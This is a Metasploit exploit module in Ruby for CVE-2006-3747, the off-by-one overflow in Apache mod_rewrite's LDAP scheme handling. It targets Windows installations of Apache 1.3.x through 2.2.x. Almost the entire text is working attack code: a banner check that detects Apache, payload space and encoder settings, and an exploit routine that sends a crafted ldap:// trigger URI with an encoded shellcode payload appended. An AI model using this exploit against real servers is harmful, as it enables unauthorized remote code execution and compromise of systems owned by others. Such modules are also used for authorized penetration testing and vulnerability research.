## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Apache Module mod_rewrite LDAP Protocol Buffer Overflow', 'Description' => %q{ This module exploits the mod_rewrite LDAP protocol scheme handling flaw discovered by Mark Dowd, which produces an off-by-one overflow. Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable. This module requires REWRITEPATH to be set accurately. In addition, the target must have 'RewriteEngine on' configured, with a specific 'RewriteRule' condition enabled to allow for exploitation. The flaw affects multiple platforms, however this module currently only supports Windows based installations. }, 'Author' => 'patrick', 'References' => [ [ 'CVE', '2006-3747' ], [ 'OSVDB', '27588' ], [ 'BID', '19204' ], [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html' ], [ 'EDB', '3680' ], [ 'EDB', '3996' ], [ 'EDB', '2237' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'AllowWin32SEH' => true }, 'Privileged' => true, 'Platform' => ['win'], 'Payload' => { 'Space' => 636, 'BadChars' => "\x00\x0a\x0d\x20", 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, 'StackAdjustment' => -3500, 'DisableNops' => 'True', }, 'Targets' => [ [ 'Automatic', {} ], # patrickw tested OK 20090310 win32 ], 'DisclosureDate' => 'Jul 28 2006', 'DefaultTarget' => 0)) register_options( [ OptString.new('REWRITEPATH', [true, "The mod_rewrite URI path", "rewrite_path"]), ], self.class) end def check res = send_request_raw({ 'uri' => '/', 'version' => '1.1', }, 2) if (res.to_s =~ /Apache/) # This could be smarter. return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit # On Linux Apache, it is possible to overwrite EIP by # sending ldap:// ... TODO patrickw trigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90' print_status("Sending payload.") send_request_raw({ 'uri' => normalize_uri(datastore['REWRITEPATH']) + trigger + payload.encoded, 'version' => '1.0', }, 2) handler end end